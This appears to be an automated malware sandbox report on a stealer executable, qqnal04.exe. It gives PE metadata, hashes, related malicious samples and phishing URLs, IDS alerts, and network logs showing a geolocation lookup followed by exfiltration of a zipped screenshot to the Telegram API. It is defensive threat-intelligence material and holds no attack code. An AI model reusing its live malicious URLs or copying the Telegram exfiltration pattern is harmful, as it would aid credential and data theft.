                                                                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      get.geojs.iohttp://optimize-system-upgrades.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 172.67.70.233
                                                                                      http://inform-customer-sale.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.0.100
                                                                                      https://resolve-alert-user.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.1.100
                                                                                      https://marketing-campaign-solution.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.0.100
                                                                                      Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.0.100
                                                                                      Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.70.233
                                                                                      rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.70.233
                                                                                      gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.70.233
                                                                                      Activation.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 104.26.1.100
                                                                                      ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                      • 104.26.0.100
                                                                                      api.telegram.orgInquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      12.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUDESCRIPTION.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 149.154.167.220
                                                                                      Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      http://telenerh-ogjf.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                      • 149.154.167.99
                                                                                      http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                      • 149.154.167.99
                                                                                      https://ofmfy.icu/Get hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.99
                                                                                      https://teiegtrm.cc/EN/Get hashmaliciousTelegram PhisherBrowse
                                                                                      • 149.154.167.99
                                                                                      https://teiegtrm.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                      • 149.154.167.99
                                                                                      CLOUDFLARENETUShttp://petruccilaw.com/Get hashmaliciousUnknownBrowse
                                                                                      • 104.17.196.192
                                                                                      PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.96.1
                                                                                      https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086Get hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      PO#_1100015533.scrGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.80.1
                                                                                      Davx2k2025.docGet hashmaliciousUnknownBrowse
                                                                                      • 104.18.95.41
                                                                                      Setup_BrightSlide_1.0.9.exeGet hashmaliciousUnknownBrowse
                                                                                      • 1.1.1.1
                                                                                      9179390927_20250115_155451.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.18.187.31
                                                                                      Davx2k2025.docGet hashmaliciousUnknownBrowse
                                                                                      • 104.18.95.41
                                                                                      https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.80.92

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eRFQ_43200046412000086500125.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      0969686.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      new order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233
                                                                                      NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                                                                      • 149.154.167.220
                                                                                      • 172.67.70.233

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qqnal04.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\qqnal04.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):1498
                                                                                      Entropy (8bit):5.364175471524945
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhBsXE4Np51qE4GIsCKIE4TKBGKoZAE4KKUN8E4KD:MxHKQwYHKGSI6okHNp51qHGIsCtHTHhX
                                                                                      MD5:5E8D4A41CB533283B16ADD9EA9F71776
                                                                                      SHA1:94024969FC44AFC689F4FA71FFB5FC138653936C
                                                                                      SHA-256:CB35783AEFE84715040AD54206C5D5037FFD1C2CA8061D760D32AFB54B3FC30A
                                                                                      SHA-512:C95DA8F274972DF0BC4C9AA594CA871CE88583FB420B316EC9BBC300FD1FEF4BA7849458001BCCCDE055898B64F75240C38CC6D1B4E54136CEABF9D089380DA5
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Con

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):5.964935332107461
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:qqnal04.exe
                                                                                      File size:125'920 bytes
                                                                                      MD5:b63e93f067d727c983c46012f35647d4
                                                                                      SHA1:07591cf86732d0e0b1f822eef2147c24bda77df3
                                                                                      SHA256:eebb47c48137f331e9e7e203763300c343a3643f88c60318667b5d525c40a058
                                                                                      SHA512:1d21215f2576df3197ba26a4e139e89b9fc72a2337ac641495d946aedb0bb416da9513d9feafbd4201e3b6dc89165623016d9e992032cfdbd417c37363f4a9d5
                                                                                      SSDEEP:1536:gE6Md2HIvcb2jJFEhFyYwDXEqECixQ7+5M9eNSarewEKweuH4Xjt/0g:gEhzcajJJYwrhTw5weYaKwEKtu8jN0g
                                                                                      TLSH:37C34B6833FD0A46E6BF8BBEBCB111444FB5F89A6921E74E5D8071D91EA17800D01BB7
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........."...0.............&.... ........@.. .......................@............`................................

                                                                                      File Icon

                                                                                      Icon Hash:00928e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x41e626
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6787A7A6 [Wed Jan 15 12:18:46 2025 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Authenticode Signature

                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=GlobalSign Extended Validation CodeSigning CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE
                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                      Error Number:-2146869232
                                                                                      Not Before, Not After
                                                                                      • 27/02/2020 11:39:39 27/02/2021 11:39:39
                                                                                      Subject Chain
                                                                                      • E=pkhach@gmail.com, CN=Promresurs LLC, O=Promresurs LLC, STREET="Yunosheskaya St., 50A, lit. A1 room 4", L=Lipetsk, S=Lipetsk Oblast, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Lipetsk Oblast, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1154827021909, OID.2.5.4.15=Private Organization
                                                                                      Version:3
                                                                                      Thumbprint MD5:6672C5047AE0188B87289E9C4ECEF74D
                                                                                      Thumbprint SHA-1:E78037283B7DD7FD04FAEE34417980EAB583F3EA
                                                                                      Thumbprint SHA-256:D9F8910AA4885F96AD66AAF0975B85368A2FDAA855C8962FC4EB212418CB59B1
                                                                                      Serial:479498519E060AE3F8BA1A40
                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      push eax
                                                                                      dec ebx
                                                                                      add dword ptr [edx], eax
                                                                                      pop ss
                                                                                      or edx, dword ptr [eax+eax]
                                                                                      add byte ptr [ecx], al
                                                                                      add al, byte ptr [ebx]
                                                                                      add al, 06h
                                                                                      or byte ptr [eax], cl
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1e5d40x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000x5cc.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1d2000x19e0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x220000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1e49c0x1c.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x1c6780x1c80035b8b9efcddab3cb4b64e11e09a199c6False0.4443959018640351data5.873973613241176IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x200000x5cc0x6007744646dd126a9b008cf0c0cf3b6d202False0.423828125data4.119288294573772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x220000xc0x2002e9661d94e28b9504501886e67235e99False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0x200900x33cdata0.4251207729468599
                                                                                      RT_MANIFEST0x203dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Download Network PCAP: filteredfull

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-15T13:34:03.066622+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549708149.154.167.220443TCP
                                                                                      2025-01-15T13:34:03.068552+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.2.549708149.154.167.220443TCP
                                                                                      2025-01-15T13:34:04.024220+01002039009ET MALWARE Win32/SaintStealer CnC Response1149.154.167.220443192.168.2.549708TCP

                                                                                      Network Port Distribution

                                                                                      • Total Packets: 69
                                                                                      • 443 (HTTPS)
                                                                                      • 53 (DNS)
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 15, 2025 13:33:56.453614950 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:56.453664064 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:56.453749895 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:56.480073929 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:56.480093956 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:56.977885962 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:56.978014946 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:56.982695103 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:56.982722044 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:56.983130932 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:57.037342072 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:57.374805927 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:57.415394068 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:57.510818958 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:57.511091948 CET44349707172.67.70.233192.168.2.5
                                                                                      Jan 15, 2025 13:33:57.511156082 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:33:57.853277922 CET49707443192.168.2.5172.67.70.233
                                                                                      Jan 15, 2025 13:34:02.112787008 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:02.112850904 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:02.113120079 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:02.113435030 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:02.113470078 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:02.766007900 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:02.766127110 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:02.770912886 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:02.770941019 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:02.771722078 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:02.773053885 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:02.815366030 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.066570997 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.067783117 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.067848921 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.067989111 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068025112 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068217993 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068420887 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068569899 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068595886 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068624020 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068639040 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068746090 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068763018 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068798065 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068814993 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068870068 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068881989 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.068953037 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.068985939 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.069025993 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069039106 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.069061995 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069078922 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.069135904 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069165945 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.069195032 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069210052 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069227934 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.069344044 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069377899 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.069427013 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069458961 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069525003 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069655895 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069690943 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069777012 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069843054 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069876909 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.069941044 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.078861952 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079013109 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079256058 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079273939 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079298973 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079341888 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079369068 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079468966 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079484940 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079509020 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079539061 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079570055 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079591036 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079629898 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079644918 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079674959 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079690933 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079709053 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079710007 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079740047 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079744101 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079765081 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079765081 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079792023 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079828024 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079832077 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079849005 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079863071 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.079876900 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079878092 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079914093 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079914093 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079946041 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.079973936 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.080022097 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.080051899 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.080051899 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:03.084574938 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:03.091011047 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:04.023652077 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:04.023863077 CET44349708149.154.167.220192.168.2.5
                                                                                      Jan 15, 2025 13:34:04.024070978 CET49708443192.168.2.5149.154.167.220
                                                                                      Jan 15, 2025 13:34:04.102833986 CET49708443192.168.2.5149.154.167.220
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 15, 2025 13:33:56.441471100 CET6271853192.168.2.51.1.1.1
                                                                                      Jan 15, 2025 13:33:56.448812962 CET53627181.1.1.1192.168.2.5
                                                                                      Jan 15, 2025 13:34:02.104887962 CET5904653192.168.2.51.1.1.1
                                                                                      Jan 15, 2025 13:34:02.111984968 CET53590461.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 15, 2025 13:33:56.441471100 CET192.168.2.51.1.1.10xb18fStandard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                                      Jan 15, 2025 13:34:02.104887962 CET192.168.2.51.1.1.10x43c0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 15, 2025 13:33:56.448812962 CET1.1.1.1192.168.2.50xb18fNo error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                                      Jan 15, 2025 13:33:56.448812962 CET1.1.1.1192.168.2.50xb18fNo error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                                      Jan 15, 2025 13:33:56.448812962 CET1.1.1.1192.168.2.50xb18fNo error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                                      Jan 15, 2025 13:34:02.111984968 CET1.1.1.1192.168.2.50x43c0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • get.geojs.io
                                                                                      • api.telegram.org

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549707172.67.70.2334433008C:\Users\user\Desktop\qqnal04.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-15 12:33:57 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                                                      Host: get.geojs.io
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-15 12:33:57 UTC1125INHTTP/1.1 200 OK
